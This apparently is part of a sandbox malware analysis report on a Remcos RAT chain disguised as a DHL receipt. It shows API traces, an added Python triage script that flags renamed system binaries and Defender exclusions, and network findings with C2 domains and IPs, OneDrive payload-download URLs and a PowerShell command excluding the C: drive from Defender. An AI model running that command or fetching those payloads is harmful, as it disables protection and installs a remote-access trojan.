Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,7_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7689D7B4C
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA47C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_2DA47C97
Source: C:\Users\Public\Libraries\yfkwifxL.pif | File opened: C:\Users\user\AppData\Local\Temp\971D.tmp
Source: C:\Users\Public\Libraries\yfkwifxL.pif | File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.tmp
Source: C:\Users\Public\Libraries\yfkwifxL.pif | File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp
Source: C:\Users\Public\Libraries\yfkwifxL.pif | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\Public\Libraries\yfkwifxL.pif | File opened: C:\Users\user\AppData\
Source: C:\Users\Public\Libraries\yfkwifxL.pif | File opened: C:\Users\user\
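The rows in this section tie the files dropped into C:\Users\Public to their real identities through their PDB strings (alpha.exe carries cmd.pdb, xkn.exe carries powershell.pdb, ger.exe carries reg.pdb, per.exe carries FodHelper.pdb) and record the Windows Defender exclusion added through the renamed PowerShell host. The script below is an added triage example written for this page; it is not part of the Joe Sandbox report or of the sample. It locates the CodeView RSDS record by byte scan, compares the PDB basename against a small table of system binaries (that table and its mapping to shipped file names are this example's assumptions), and flags command lines that add a Defender exclusion. The PE images it runs on are constructed in the block.

```python
"""Added triage checks for two rows above: system binaries copied to new names
(identified by the PDB name in their CodeView debug record) and a command line
that adds a Windows Defender exclusion."""
import re
import struct
from pathlib import PureWindowsPath
from typing import Optional

# PDB basename -> the file name that binary normally ships under.
# The PDB names are the ones reported above; mapping them to shipped file
# names is an assumption of this example.
KNOWN_SYSTEM_PDBS = {
    "cmd.pdb": "cmd.exe",
    "powershell.pdb": "powershell.exe",
    "reg.pdb": "reg.exe",
    "fodhelper.pdb": "fodhelper.exe",
}

# Matches the exclusion-adding cmdlet regardless of what the PowerShell host
# binary was renamed to (xkn in the report) or how the path is quoted.
DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b",
    re.IGNORECASE,
)


def pdb_path_from_rsds(data: bytes) -> Optional[str]:
    """Return the PDB path from the first CodeView RSDS record in `data`.

    Record layout: b"RSDS", 16-byte GUID, 4-byte age, NUL-terminated path.
    A plain byte scan is used instead of walking the PE debug directory so
    the same check works on memory dumps and partially unpacked images.
    """
    off = data.find(b"RSDS")
    if off < 0:
        return None
    start = off + 4 + 16 + 4
    end = data.find(b"\x00", start)
    if end < 0:
        return None
    try:
        return data[start:end].decode("ascii")
    except UnicodeDecodeError:
        return None


def renamed_system_binary(file_name: str, data: bytes) -> Optional[str]:
    """If `data` is a known system binary stored under a different name,
    return the name it normally ships under; otherwise return None."""
    pdb = pdb_path_from_rsds(data)
    if pdb is None:
        return None
    expected = KNOWN_SYSTEM_PDBS.get(PureWindowsPath(pdb).name.lower())
    if expected is None or file_name.lower() == expected:
        return None
    return expected


def adds_defender_exclusion(cmdline: str) -> bool:
    """True if the command line adds a Defender exclusion via Add-MpPreference."""
    return DEFENDER_EXCLUSION.search(cmdline) is not None


def fake_pe_with_pdb(pdb_path: str) -> bytes:
    """Constructed stand-in for a PE image: MZ bytes, padding, one RSDS
    record, padding. Real images locate the record via the debug directory."""
    record = b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1) + pdb_path.encode() + b"\x00"
    return b"MZ" + b"\x00" * 62 + record + b"\x00" * 16


if __name__ == "__main__":
    # File names from the report; file contents are constructed here.
    samples = {
        "alpha.exe": fake_pe_with_pdb("cmd.pdb"),
        "xkn.exe": fake_pe_with_pdb("powershell.pdb"),
        "ger.exe": fake_pe_with_pdb("reg.pdb"),
        "per.exe": fake_pe_with_pdb("FodHelper.pdb"),
        "cmd.exe": fake_pe_with_pdb("cmd.pdb"),
    }
    for name, blob in samples.items():
        print(f"{name}: renamed copy of {renamed_system_binary(name, blob)}")
    cmd = r"C:\Users\Public\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"
    print("adds Defender exclusion:", adds_defender_exclusion(cmd))
```

On a live host the same two functions can be pointed at every file under C:\Users\Public and at the process-creation log; a match on either is a strong lead here because the report shows both behaviours from the same infection chain.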

              Networking

Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49736 -> 23.227.203.18:44577
Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 23.227.203.18:44577 -> 192.168.2.4:49736
Source: Malware configuration extractor | URLs: https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8
Source: Malware configuration extractor | URLs: jantasagasa.duckdns.org
Source: unknown | DNS query: name: jantasagasa.duckdns.org
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028BD028 InternetCheckConnectionA,0_2_028BD028
Source: global traffic | TCP traffic: 192.168.2.4:49736 -> 23.227.203.18:44577
Source: global traffic | HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 13.107.43.12
Source: Joe Sandbox View | IP Address: 13.107.137.11
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: HVC-ASUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected:
    GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: onedrive.live.com
Source: global traffic | HTTP traffic detected:
    GET /y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sxjVaZT4pY1q2eD0v-X1wiwRbDuGgZo1tPSkJQs1YlyPwcUOiphPP1CFv5fso0icEDo7UAOw11RMGNT3gKAlqFYfTYnpmUh-zszDDp01M-O6V1fxPW_BQeV--ErDLGsxS3W7ik99EAoJzOkWYmsVxFxg/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: ppeppa.db.files.1drv.com
Source: global traffic | HTTP traffic detected:
    GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: onedrive.live.com
Source: global traffic | HTTP traffic detected:
    GET /y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtduMf3h_au6JknD7UX3Nl_MoVpKgD52R4PqoJUKWWdS4uSG73hTWQdvja7P44RRgZEYiLLcwYHjthc2obdA6bfKdGY5u4FdO7DnLs4oCuESa0XFsNGj4J9xIGakwI-vvnf8T5wmslL_zbb61Cor0vi4A/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: ppeppa.db.files.1drv.com
Source: global traffic | HTTP traffic detected:
    GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: onedrive.live.com
Source: global traffic | HTTP traffic detected:
    GET /y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4lwBmhbII6IBdf0o3fxZK7yXuPn1LU5GNfJiPoJA9A_3sVCDQ9m4bgvnVzMP5THmKtOGhfXkUIlvBLYfdv66aM2t5dQKJV9HM_tE2EpVyspDfMklEPIq63I71zYBRHlyxU6NlRs6xSUBmbwPAYp6Jhg/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: ppeppa.db.files.1drv.com
Source: global traffic | HTTP traffic detected:
    GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: onedrive.live.com
Source: global traffic | HTTP traffic detected:
    GET /y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyvTlU4SuVfoR9x-Iomuy2BGk4fUfgK1MMU5lLacLNp-_qwXhodYEIY-kbbcZJlxV0oGHQD1Ct2YWj0uKczDCYctblhO9FSOouYIL0JztXtWXSZy4aW13cnRilCw1aQM1FfakIYbRqJw9b266qfDhk_4fORrQ/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: ppeppa.db.files.1drv.com
Source: global traffic | HTTP traffic detected:
    GET /download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: onedrive.live.com
Source: global traffic | HTTP traffic detected:
    GET /y4mwqLrk7RkQprlQVguzd88u3aa6lBoHekLBbEwen4SV_s0bZDyk4W2wHSklQ9o0cCCMUNAFWFXBJMd5EVMwo_6Fwd9E2VHHxYJdf6JUZ-XNUvMWe3LcrUXywANQk_fQBIHV4OAxI-dyvQC_XAAoGU5rhOshlVK_uuOzHfxjtkmujdvM7GtN2qEEWRWumZ9nPPxMahWmeQsnUX_PjspIY14YQ/233_Lxfiwkfyxaf?download&psid=1 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: ppeppa.db.files.1drv.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA66CB1 recv,0_2_2DA66CB1
Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: //login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: //login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
              Source: remcos.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: bhvC179.tmp.20.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (LinkedIn)
              Source: bhvC179.tmp.20.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (LinkedIn)
              Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
              Source: global trafficDNS traffic detected: DNS query: ppeppa.db.files.1drv.com
              Source: global trafficDNS traffic detected: DNS query: jantasagasa.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: bhvC179.tmp.20.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: bhvC179.tmp.20.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: DHL119040 receipt document,pdf.exe, remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000068F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000614000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:R
              Source: remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpv
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhvC179.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0Q
